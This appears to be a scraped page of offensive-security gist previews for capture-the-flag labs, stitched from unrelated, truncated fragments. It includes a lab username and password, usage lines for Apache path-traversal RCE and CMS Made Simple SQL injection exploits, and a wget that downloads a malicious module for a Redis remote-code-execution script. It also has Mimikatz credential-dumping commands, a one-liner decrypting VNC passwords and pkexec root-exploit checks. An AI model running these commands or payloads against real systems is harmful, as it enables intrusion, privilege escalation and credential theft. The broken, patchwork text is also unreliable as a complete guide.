Error:
10.129.232.168\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
Solution 1: Add -k flag to authenticate through Kerberos
| # !/usr/bin/python3 | |
| # Author: Ravin | Blacknote | |
| # Link: https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution/blob/main/exploit.py | |
| # CVE-2021-41773 | CVE-2021-42013 | |
| # Apache HTTP Server 2.4.49-2.4.50 - Path Traversal & Remote Code Execution | |
| # Usage: | |
| # in some cases, reading files or rce might fail, so try both of them | |
| # python3 Apache-2.4.49-2.4.50 127.0.0.1 8080 rce 'id' | |
| # python3 Apache-2.4.49-2.4.50 127.0.0.1 8080 file '/etc/passwd' |
| #!/usr/bin/env python3 | |
| # Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9 | |
| # Original-Date: 30-03-2019 | |
| # Exploit Author: Daniele Scanu @ Certimeter Group (https://gist.github.com/pdelteil/6ebac2290a6fb33eea1af194485a22b1) | |
| # Vendor Homepage: https://www.cmsmadesimple.org/ | |
| # Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ | |
| # Version: <= 2.2.9 | |
| # Tested on: Ubuntu 18.04 LTS | |
| # CVE : CVE-2019-9053 | |
| # Usage: python3 cmsms_2.2.9_sqli.py -u http://$IP/simple/ -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt -c |
| # First, install this .so | |
| ``` | |
| wget -O exp.so https://github.com/strikoder/OffensiveSecurity/raw/refs/heads/main/CVES/exp.so | |
| ``` | |
| # Then, save the next python file (source: https://github.com/Ridter/redis-rce/blob/master/redis-rce.py) | |
| # try other ports if 80 didn't work | |
| # and run it python3 payload.py --rhost 192.168.209.176 --lhost 192.168.45.238 --lport 80 --rport 6379 --file exp.so | |
| ```payload.py | |
| #!/usr/bin/env python |
| ################################################################################ | |
| # Mimikatz — Quick Commands & Explanations (lab: `pentest.local`) | |
| # Video's Link: https://youtu.be/XPxqZFaC0xE | |
| # Lab assumptions: domain `pentest.local`, DC `LAB-DC`, hosts `LAB-FINANCE`, `LAB-MEDIA`. | |
| # Run Mimikatz as Administrator / SYSTEM and use the x64 build on x64 hosts. | |
| ################################################################################ | |
| ## BASICS — setup & checks | |
| # show mimikatz version (verify x64 build) | |
| mimikatz # version |
| # check HTB [Cascade](https://www.hackthebox.com/machines/cascade) for more info | |
| # Step1: get your vnc pass (e.x:6b,cf,2a,4b,6e,5a,ca,0f) | |
| # Step2: remove the comma => 6bcf2a4b6e5aca0f | |
| # step3: use this one liner | |
| ```bash | |
| echo -n [6bcf2a4b6e5aca0f:the value from above] | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv | |
| ``` | |
| ## [More info](https://github.com/frizb/PasswordDecrypts) on VNC |
Local privilege escalation exploit for polkit pkexec vulnerability (CVE-2021-4034). Grants root shell on vulnerable Linux systems.
/usr/bin/pkexec --version # ≤ 0.120
uname -r # 5.3.0-42 5.4.0-107 OR cat /etc/issue
ls -la /usr/bin/pkexec # Should have SUID bit